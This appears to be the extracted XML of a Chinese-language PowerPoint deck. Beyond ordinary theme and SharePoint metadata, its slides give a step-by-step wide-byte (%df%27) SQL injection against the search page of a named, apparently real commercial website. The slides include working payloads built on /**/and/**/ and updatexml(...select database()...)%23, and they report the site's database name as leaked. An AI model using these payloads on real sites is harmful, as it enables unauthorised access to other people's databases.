                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>lianhe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1014857" y="2718737"/>
            <a:ext cx="7114286" cy="228571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latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>我</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>更</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>推荐用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/**/and/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(1,concat(1,(select/**/database())),1)%23</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10243" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3202728"/>
            <a:ext cx="8229600" cy="13177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lank">
  <a:themeElements>
    <a:clrScheme name="Custom 1">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="1D3444"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="8589A1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="ED1A3D"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="EBE013"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="E32490"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C0C2C4"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="ABD8DC"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="0096B3"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00B9E3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="006F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E_ppt_4x3.pptx [Read-Only]" id="{5F9B16EF-EBC9-41CD-95EE-0C6941C041EF}" vid="{8729C5D8-75B0-4CB3-9C4A-D4ED606D2F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file>

<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
<ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x01010041B9D9FF6CBB604C9E1DEEB0A7AC19C2" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="acd29717c0fb6f4bcc4266517d61b23e">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="7e0f54df-ea4c-4e2f-b548-6a171b435a47" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="dba02bd4ab6324e193f01b97a7a3ac5a" ns2:_="">
    <xsd:import namespace="7e0f54df-ea4c-4e2f-b548-6a171b435a47"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:_dlc_DocId" minOccurs="0"/>
                <xsd:element ref="ns2:_dlc_DocIdUrl" minOccurs="0"/>
                <xsd:element ref="ns2:_dlc_DocIdPersistId" minOccurs="0"/>
                <xsd:element ref="ns2:dcb22cdabd7e4624b5bf1642ffbcc1f5" minOccurs="0"/>
                <xsd:element ref="ns2:TaxCatchAll" minOccurs="0"/>
                <xsd:element ref="ns2:TaxCatchAllLabel" minOccurs="0"/>
                <xsd:element ref="ns2:c137beb4647f48e1b4858cde3a671b94" minOccurs="0"/>
                <xsd:element ref="ns2:d550a6efa6d04dd3a5eb1387183a1ee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0f54df-ea4c-4e2f-b548-6a171b435a4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cb22cdabd7e4624b5bf1642ffbcc1f5" ma:index="11" nillable="true" ma:taxonomy="true" ma:internalName="dcb22cdabd7e4624b5bf1642ffbcc1f5" ma:taxonomyFieldName="GuidesandResourcesAudience" ma:displayName="Audience" ma:fieldId="{dcb22cda-bd7e-4624-b5bf-1642ffbcc1f5}" ma:taxonomyMulti="true" ma:sspId="e0266e0a-76a9-4607-b053-513866fe5647" ma:termSetId="b8c4b4df-caac-4b11-bdd3-d4a9a37e705a" ma:anchorId="00000000-0000-0000-0000-000000000000" ma:open="false" ma:isKeyword="false">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element ref="pc:Terms" minOccurs="0" maxOccurs="1"/>
        </xsd:sequence>
      </xsd:complexType>
    </xsd:element>
    <xsd:element name="TaxCatchAll" ma:index="12" nillable="true" ma:displayName="Taxonomy Catch All Column" ma:hidden="true" ma:list="{e6277896-64a3-47ce-b65c-b5c8de6555a8}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="7e0f54df-ea4c-4e2f-b548-6a171b435a47">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e6277896-64a3-47ce-b65c-b5c8de6555a8}" ma:internalName="TaxCatchAllLabel" ma:readOnly="true" ma:showField="CatchAllDataLabel" ma:web="7e0f54df-ea4c-4e2f-b548-6a171b435a47">
      <xsd:complexType>
        <xsd:complexContent>
          <xsd:extension base="dms:MultiChoiceLookup">
            <xsd:sequence>
              <xsd:element name="Value" type="dms:Lookup" maxOccurs="unbounded" minOccurs="0" nillable="true"/>
            </xsd:sequence>
          </xsd:extension>
        </xsd:complexContent>
      </xsd:complexType>
    </xsd:element>
    <xsd:element name="c137beb4647f48e1b4858cde3a671b94" ma:index="15" nillable="true" ma:taxonomy="true" ma:internalName="c137beb4647f48e1b4858cde3a671b94" ma:taxonomyFieldName="GuidesandResourcesTopic" ma:displayName="Topic" ma:fieldId="{c137beb4-647f-48e1-b485-8cde3a671b94}" ma:taxonomyMulti="true" ma:sspId="e0266e0a-76a9-4607-b053-513866fe5647" ma:termSetId="631d41d5-3326-49c0-a2fe-101255290237" ma:anchorId="00000000-0000-0000-0000-000000000000" ma:open="false" ma:isKeyword="false">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element ref="pc:Terms" minOccurs="0" maxOccurs="1"/>
        </xsd:sequence>
      </xsd:complexType>
    </xsd:element>
    <xsd:element name="d550a6efa6d04dd3a5eb1387183a1ee5" ma:index="17" nillable="true" ma:taxonomy="true" ma:internalName="d550a6efa6d04dd3a5eb1387183a1ee5" ma:taxonomyFieldName="GuidesandResourcesDocumentType" ma:displayName="Document Type" ma:fieldId="{d550a6ef-a6d0-4dd3-a5eb-1387183a1ee5}" ma:taxonomyMulti="true" ma:sspId="e0266e0a-76a9-4607-b053-513866fe5647" ma:termSetId="e8b5b600-f22a-4648-9bd5-c0aa4d7e488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550a6efa6d04dd3a5eb1387183a1ee5 xmlns="7e0f54df-ea4c-4e2f-b548-6a171b435a47">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </d550a6efa6d04dd3a5eb1387183a1ee5>
    <dcb22cdabd7e4624b5bf1642ffbcc1f5 xmlns="7e0f54df-ea4c-4e2f-b548-6a171b435a47">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </dcb22cdabd7e4624b5bf1642ffbcc1f5>
    <TaxCatchAll xmlns="7e0f54df-ea4c-4e2f-b548-6a171b435a47"/>
    <c137beb4647f48e1b4858cde3a671b94 xmlns="7e0f54df-ea4c-4e2f-b548-6a171b435a47">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </c137beb4647f48e1b4858cde3a671b94>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191CB-A024-4081-A1E0-14819E861711}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/events"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C8C8F10B-1BCB-4109-9323-7D0E104350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0f54df-ea4c-4e2f-b548-6a171b435a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5C24F2-9E93-4A84-AC18-CBD3FBE675DB}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>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 ds:uri="7e0f54df-ea4c-4e2f-b548-6a171b435a47"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B808F5A2-E98B-4339-BF45-54351EAB73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65</TotalTime>
  <Words>166</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>10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blank</vt:lpstr>
      <vt:lpstr>Slide 1</vt:lpstr>
      <vt:lpstr>http://www.yiwulianhe.com/</vt:lpstr>
      <vt:lpstr>闭合单引号时，开发用过滤器规则在你的单引号前面加一个\ ， 这样就无法闭合单引号 方法：可以在\前输入%df，就构成了 %df\ 经过GBK解释器解码后就成为汉字，  (百度可查宽字节注入) 在输入%df %27后，URL编码时如下，将多的25去掉  </vt:lpstr>
      <vt:lpstr>去掉25后，页面（mySQL报错）恭喜你，成功的将SQL出错信息暴露。 http://www.yiwulianhe.com/search.php?keywords=%df%27&amp;part=information SQL语句原型：select * from table where id like(‘%XXX%’) ,前一个单引号已关闭，如何关闭第一个括号？答：再加一个）即可 %df’) ,单引号和括号都已经关闭了，如何把后面的注释掉呢？用-- （--后一定要用空格） </vt:lpstr>
      <vt:lpstr>Slide 5</vt:lpstr>
      <vt:lpstr>试# 也是注释符,但URL编码，把＃去掉了 </vt:lpstr>
      <vt:lpstr>试把＃换成％23 注入成功了</vt:lpstr>
      <vt:lpstr>这时就可以试着在注释符前插入注入语句info()来构造伪SQL语句 LIKE '%運')info()#%')  Info()前需要加连接符，and .空格符用/**/   /**/and/**/ ,即%df%27)/**/and/**/info()%23 数据库为lianhe </vt:lpstr>
      <vt:lpstr>我更推荐用/**/and/**/updatexml(1,concat(1,(select/**/database())),1)%23</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guanyan</dc:creator>
  <cp:lastModifiedBy>guanyan</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2015-01-03T07:13:11Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-21T08:00:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-21T09:06:02Z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0x01010041B9D9FF6CBB604C9E1DEEB0A7AC19C2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="GuidesandResourcesAudience">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="GuidesandResourcesDocumentType">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="GuidesandResourcesTopic">
    <vt:lpwstr/>
  </property>
</Properties>
</file>